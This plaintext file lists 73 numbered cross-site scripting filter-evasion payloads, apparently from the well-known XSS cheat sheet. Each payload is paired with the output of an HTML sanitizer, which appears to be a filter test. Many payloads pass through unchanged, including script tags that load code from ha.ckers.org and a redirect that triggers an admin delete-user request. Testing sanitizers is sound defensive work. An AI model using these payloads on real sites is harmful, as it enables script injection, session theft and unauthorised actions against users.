643 lines
15 KiB
Plaintext
643 lines
15 KiB
Plaintext
1. XSS Locator
|
|
|
|
Input code »
|
|
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
|
|
Output code »
|
|
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
|
|
2. XSS Quick Test
|
|
|
|
Input code »
|
|
'';!--"<XSS>=&{()}
|
|
|
|
Output code »
|
|
'';!--"<XSS>=&{()}
|
|
|
|
3. SCRIPT w/Alert()
|
|
|
|
Input code »
|
|
<SCRIPT>alert('XSS')</SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT>alert('XSS')</SCRIPT>
|
|
|
|
4. SCRIPT w/Source File
|
|
|
|
Input code »
|
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
|
|
5. SCRIPT w/Char Code
|
|
|
|
Input code »
|
|
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
|
|
6. DIV background-image 1
|
|
|
|
Input code »
|
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
|
|
Output code »
|
|
<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
|
|
|
|
7. DIV background-image 2
|
|
|
|
Input code »
|
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
|
|
Output code »
|
|
<div style="background-image: url(denied:&#1;javascript:alert('XSS'))"></div>
|
|
|
|
8. DIV expression
|
|
|
|
Input code »
|
|
<DIV STYLE="width: expression(alert('XSS'));">
|
|
|
|
Output code »
|
|
<div style="width: (alert('XSS'));"></div>
|
|
|
|
9. IFRAME
|
|
|
|
Input code »
|
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
|
|
Output code »
|
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
|
|
10. INPUT Image
|
|
|
|
Input code »
|
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
|
|
Output code »
|
|
<input type="image" src="denied:javascript:alert('XSS');" />
|
|
|
|
11. IMG w/JavaScript Directive
|
|
|
|
Input code »
|
|
<IMG SRC="javascript:alert('XSS');">
|
|
|
|
Output code »
|
|
<img src="denied:javascript:alert('XSS');" alt="image" />
|
|
|
|
12. IMG No Quotes/Semicolon
|
|
|
|
Input code »
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
|
|
Output code »
|
|
<img src="denied:javascript:alert(" alt="image" />
|
|
|
|
13. IMG Dynsrc
|
|
|
|
Input code »
|
|
<IMG DYNSRC="javascript:alert('XSS');">
|
|
|
|
Output code »
|
|
<img src="src" alt="image" />
|
|
|
|
14. IMG Lowsrc
|
|
|
|
Input code »
|
|
<IMG LOWSRC="javascript:alert('XSS');">
|
|
|
|
Output code »
|
|
<img src="src" alt="image" />
|
|
|
|
15. IMG Embedded commands 1
|
|
|
|
Input code »
|
|
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
|
|
|
Output code »
|
|
<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
|
|
|
|
16. IMG Embedded commands 2
|
|
|
|
Input code »
|
|
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
|
|
|
Output code »
|
|
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
|
|
|
17. IMG STYLE w/expression
|
|
|
|
Input code »
|
|
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|
|
|
Output code »
|
|
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|
|
|
18. IMG w/VBscript
|
|
|
|
Input code »
|
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
|
|
|
Output code »
|
|
<img src="denied:vbscript:msgbox("XSS")" alt="image" />
|
|
|
|
19. LAYER
|
|
|
|
Input code »
|
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
|
|
|
Output code »
|
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
|
|
|
20. Livescript
|
|
|
|
Input code »
|
|
<IMG SRC="livescript:[code]">
|
|
|
|
Output code »
|
|
<img src="denied:livescript:[code]" alt="image" />
|
|
|
|
21. US-ASCII encoding
|
|
|
|
Input code »
|
|
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
|
|
|
Output code »
|
|
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
|
|
|
22. Mocha
|
|
|
|
Input code »
|
|
<IMG SRC="mocha:[code]">
|
|
|
|
Output code »
|
|
<img src="denied:mocha:[code]" alt="image" />
|
|
|
|
23. OBJECT
|
|
|
|
Input code »
|
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
|
|
|
Output code »
|
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
|
|
|
24. OBJECT w/Embedded XSS
|
|
|
|
Input code »
|
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
|
|
|
Output code »
|
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>
|
|
|
|
25. Embed Flash
|
|
|
|
Input code »
|
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
|
|
|
Output code »
|
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
|
|
|
26. OBJECT w/Flash 2
|
|
|
|
Input code »
|
|
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
|
|
eval(a+b+c+d);
|
|
|
|
Output code »
|
|
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
|
|
eval(a+b+c+d);
|
|
|
|
27. STYLE
|
|
|
|
Input code »
|
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|
|
|
Output code »
|
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|
|
|
28. STYLE w/Comment
|
|
|
|
Input code »
|
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
|
|
Output code »
|
|
<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
|
|
|
|
29. STYLE w/Anonymous HTML
|
|
|
|
Input code »
|
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
|
|
Output code »
|
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
|
|
30. TABLE
|
|
|
|
Input code »
|
|
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
|
|
|
Output code »
|
|
<table></table>
|
|
|
|
31. TD
|
|
|
|
Input code »
|
|
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
|
|
|
Output code »
|
|
<table><td></td></table>
|
|
|
|
32. XML namespace
|
|
|
|
Input code »
|
|
<HTML xmlns:xss>
|
|
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
|
<xss:xss>XSS</xss:xss>
|
|
</HTML>
|
|
|
|
Output code »
|
|
<HTML xmlns:xss>
|
|
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
|
<xss:xss>XSS</xss:xss>
|
|
</HTML>
|
|
|
|
33. XML data island w/CDATA
|
|
|
|
Input code »
|
|
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
|
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
|
|
|
|
Output code »
|
|
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
|
</C></X></xml><span></span>
|
|
|
|
34. XML data island w/comment
|
|
|
|
Input code »
|
|
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
|
|
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
|
|
|
Output code »
|
|
<XML ID="xss"><i><b><img src="src" alt="image" />cript:alert('XSS')"></b></i></XML>
|
|
<span></span>
|
|
|
|
35. XML (locally hosted)
|
|
|
|
Input code »
|
|
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
|
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
|
|
|
Output code »
|
|
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
|
<span></span>
|
|
|
|
36. XML HTML+TIME
|
|
|
|
Input code »
|
|
<HTML><BODY>
|
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
|
<?import namespace="t" implementation="#default#time2">
|
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
|
|
|
|
Output code »
|
|
<HTML><BODY>
|
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
|
<?import namespace="t" implementation="#default#time2">
|
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
|
|
|
|
37. Commented-out Block
|
|
|
|
Input code »
|
|
<!--[if gte IE 4]>
|
|
<SCRIPT>alert('XSS');</SCRIPT>
|
|
<![endif]-->
|
|
|
|
Output code »
|
|
<!--[if gte IE 4]>
|
|
<SCRIPT>alert('XSS');</SCRIPT>
|
|
<![endif]-->
|
|
|
|
38. Rename .js to .jpg
|
|
|
|
Input code »
|
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
|
|
|
39. SSI
|
|
|
|
Input code »
|
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
|
|
|
Output code »
|
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
|
|
|
40. PHP
|
|
|
|
Input code »
|
|
<? echo('<SCR)';
|
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
|
|
|
Output code »
|
|
<? echo('<SCR)';
|
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
|
|
|
41. JavaScript Includes
|
|
|
|
Input code »
|
|
<BR SIZE="&{alert('XSS')}">
|
|
|
|
Output code »
|
|
<br />
|
|
|
|
42. Case Insensitive
|
|
|
|
Input code »
|
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
|
|
Output code »
|
|
<img src="denied:JaVaScRiPt:alert(" alt="image" />
|
|
|
|
43. HTML Entities
|
|
|
|
Input code »
|
|
<IMG SRC=javascript:alert("XSS")>
|
|
|
|
Output code »
|
|
<img src="denied:javascript:alert("XSS")" alt="image" />
|
|
|
|
44. Grave Accents
|
|
|
|
Input code »
|
|
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
|
|
|
Output code »
|
|
<img src="denied:`javascript:alert(" alt="image" />
|
|
|
|
45. Image w/CharCode
|
|
|
|
Input code »
|
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
|
|
Output code »
|
|
<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
|
|
|
|
46. UTF-8 Unicode Encoding
|
|
|
|
Input code »
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
|
|
Output code »
|
|
<img src="denied:javascript:alert('XSS')" alt="image" />
|
|
|
|
47. Long UTF-8 Unicode w/out Semicolons
|
|
|
|
Input code »
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
|
|
Output code »
|
|
<img src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041" alt="image" />
|
|
|
|
48. DIV w/Unicode
|
|
|
|
Input code »
|
|
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|
|
|
Output code »
|
|
<div style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029' 029"></div>
|
|
|
|
49. Hex Encoding w/out Semicolons
|
|
|
|
Input code »
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
|
|
Output code »
|
|
<img src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29" alt="image" />
|
|
|
|
50. Embedded Tab
|
|
|
|
Input code »
|
|
<IMG SRC="jav ascript:alert('XSS');">
|
|
|
|
Output code »
|
|
<img src="denied:jav ascript:alert('XSS');" alt="image" />
|
|
|
|
51. Embedded Encoded Tab
|
|
|
|
Input code »
|
|
<IMG SRC="jav	ascript:alert('XSS');">
|
|
|
|
Output code »
|
|
<img src="denied:jav	ascript:alert('XSS');" alt="image" />
|
|
|
|
52. Embedded Newline
|
|
|
|
Input code »
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
|
|
Output code »
|
|
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
|
|
|
|
53. Embedded Carriage Return
|
|
|
|
Input code »
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
|
|
Output code »
|
|
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
|
|
|
|
54. Multiline w/Carriage Returns
|
|
|
|
Input code »
|
|
<IMG
|
|
SRC
|
|
=
|
|
"
|
|
j
|
|
a
|
|
v
|
|
a
|
|
s
|
|
c
|
|
r
|
|
i
|
|
p
|
|
t
|
|
:
|
|
a
|
|
l
|
|
e
|
|
r
|
|
t
|
|
(
|
|
'
|
|
X
|
|
S
|
|
S
|
|
'
|
|
)
|
|
"
|
|
>
|
|
|
|
Output code »
|
|
<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />
|
|
|
|
55. Spaces/Meta Chars
|
|
|
|
Input code »
|
|
<IMG SRC="  javascript:alert('XSS');">
|
|
|
|
Output code »
|
|
<img src="denied:&#14; javascript:alert('XSS');" alt="image" />
|
|
|
|
56. Non-Alpha/Non-Digit
|
|
|
|
Input code »
|
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
57. Non-Alpha/Non-Digit Part 2
|
|
|
|
Input code »
|
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
|
|
Output code »
|
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
|
|
58. No Closing Script Tag
|
|
|
|
Input code »
|
|
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
|
|
|
Output code »
|
|
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
|
|
|
59. Protocol resolution in script tags
|
|
|
|
Input code »
|
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
|
|
|
Output code »
|
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
|
|
|
60. Half-Open HTML/JavaScript
|
|
|
|
Input code »
|
|
<IMG SRC="javascript:alert('XSS')"
|
|
|
|
Output code »
|
|
<IMG SRC="javascript:alert('XSS')"
|
|
|
|
61. Double open angle brackets
|
|
|
|
Input code »
|
|
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
|
|
|
Output code »
|
|
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
|
|
|
62. Extraneous Open Brackets
|
|
|
|
Input code »
|
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
|
|
Output code »
|
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
|
|
63. Malformed IMG Tags
|
|
|
|
Input code »
|
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
|
|
Output code »
|
|
<img src="src" alt="image" /><SCRIPT>alert("XSS")</SCRIPT>">
|
|
|
|
64. No Quotes/Semicolons
|
|
|
|
Input code »
|
|
<SCRIPT>a=/XSS/
|
|
alert(a.source)</SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT>a=/XSS/
|
|
alert(a.source)</SCRIPT>
|
|
|
|
65. Evade Regex Filter 1
|
|
|
|
Input code »
|
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
66. Evade Regex Filter 2
|
|
|
|
Input code »
|
|
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
67. Evade Regex Filter 3
|
|
|
|
Input code »
|
|
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
68. Evade Regex Filter 4
|
|
|
|
Input code »
|
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
69. Evade Regex Filter 5
|
|
|
|
Input code »
|
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
70. Filter Evasion 1
|
|
|
|
Input code »
|
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
71. Filter Evasion 2
|
|
|
|
Input code »
|
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
Output code »
|
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
|
|
72. Mixed Encoding
|
|
|
|
Input code »
|
|
<A HREF="h
|
|
tt p://6	6.000146.0x7.147/">XSS</A>
|
|
|
|
Output code »
|
|
<a href="denied:h tt p://6	6.000146.0x7.147/">XSS</a>
|
|
|
|
73. JavaScript Link Location
|
|
|
|
Input code »
|
|
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
|
|
|
Output code »
|
|
<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>
|